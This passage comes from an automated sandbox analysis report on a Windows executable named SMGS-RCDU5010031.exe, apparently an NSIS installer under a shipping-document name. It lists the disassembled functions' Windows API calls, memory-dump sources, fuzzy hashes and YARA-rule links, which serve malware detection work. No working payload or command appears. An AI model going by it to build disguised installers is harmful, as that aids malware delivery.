                                                                                                                                                                                                            • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(004310E8,004310E8,00000400), ref: 00405DD8
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405DF6
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405E31
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E40
                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                                                                                                                                          • SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405ECE
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405EDF
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EE6
                                                                                                                                                                                                            • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C29
                                                                                                                                                                                                            • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C4B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                                                                                          • API String ID: 222337774-899692902
                                                                                                                                                                                                          • Opcode ID: 32b57ce3ca8940dfd53990341f9ef3c7080b2e07a05584e4532bbcc5854619bf
                                                                                                                                                                                                          • Instruction ID: 0ee0d7f4969d0e8ff8498481139b35b4394cb67f0e1a7fb2b2bdcfef73d002b4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32b57ce3ca8940dfd53990341f9ef3c7080b2e07a05584e4532bbcc5854619bf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59310230200B147BD2207B619D49F6B3A6CDF45759F14003BBA85F62D2DA7C9E018EEC
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004062E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75BA3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                                                                                                                                          • CharNextW.USER32(?,00000000,75BA3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                                                                                                                                          • CharPrevW.USER32(?,?,75BA3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • "C:\Users\user\Desktop\SMGS-RCDU5010031.exe", xrefs: 004062E4
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004062E5
                                                                                                                                                                                                          • *?|<>/":, xrefs: 00406336
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 589700163-1684567186
                                                                                                                                                                                                          • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                                                                                                                                          • Instruction ID: 318300b0f17d4b51c4b24ffcfd5e9ca079934b39012f6efb3a6e40df4f12a45c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF11B22680071695DB303B149C40AB7A2B8EF58790B56903FED8AB32C1F77C5C9286FD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040417B Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404198
                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 004041B4
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004041C0
                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 004041CC
                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004041DF
                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 004041EF
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404209
                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404213
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                          • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                                                                                          • Instruction ID: 1f16dc129e5574868776b4f98a2cc19ea4617ee8107c94e5cfbd03f7ded5ca1d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F2181B1500704ABCB219F68DE08B5BBBF8AF41714B04896DF992F66A0D734E944CB64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004051AF Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                                                                          • lstrlenW.KERNEL32(0040318B,0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                                                                          • lstrcatW.KERNEL32(0042C228,0040318B), ref: 0040520A
                                                                                                                                                                                                          • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040521C
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                                                                                          • Opcode ID: e3fc960ff43bac39058fc79546c11771123aad835ff3a9f0579e84c03a5b243d
                                                                                                                                                                                                          • Instruction ID: 3abc69651b1b947d68a29ef5f67bb3ab151c750651a003a3f474b57aa403b91e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3fc960ff43bac39058fc79546c11771123aad835ff3a9f0579e84c03a5b243d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6216D71900518BACB119FA5DD85ECFBFB8EF45354F14807AF944B62A0C7798A50CF68
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404A79 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A94
                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404A9C
                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404AB6
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AC8
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AEE
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                          • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                                                                                                                                          • Instruction ID: f7db0f90848f06194adfa2b80852422f0d01f782293f8b66888e1da33f3275eb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28015271E4021CBADB00DB94DD85FFEBBBCAF59711F10012BBA51B61C0C7B495018BA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402D22
                                                                                                                                                                                                          • MulDiv.KERNEL32(002984EB,00000064,0029A768), ref: 00402D4D
                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                                          • Opcode ID: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                                                                                                                                          • Instruction ID: e3b7989a6944ee3f74a5da6e22ee0ffb045f4e525cc1af55651639455de3416a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9014F7064020DBBEF249F61DE49FEA3B69FB04304F008439FA02A91E0DBB889559B58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                                                                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4216380887-0
                                                                                                                                                                                                          • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                                                                                          • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                          • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                                                                                          • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                                          • Opcode ID: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                                                                                                                                          • Instruction ID: 1aef917cd227803a683e0008524bb9a83fcfbb8b8ade77014dfab24c7f5e3f69
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F121C172800128BBCF216FA5CE49D9E7E79EF09324F20023AF510762E1C7795D418FA8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                                                                                          Strings
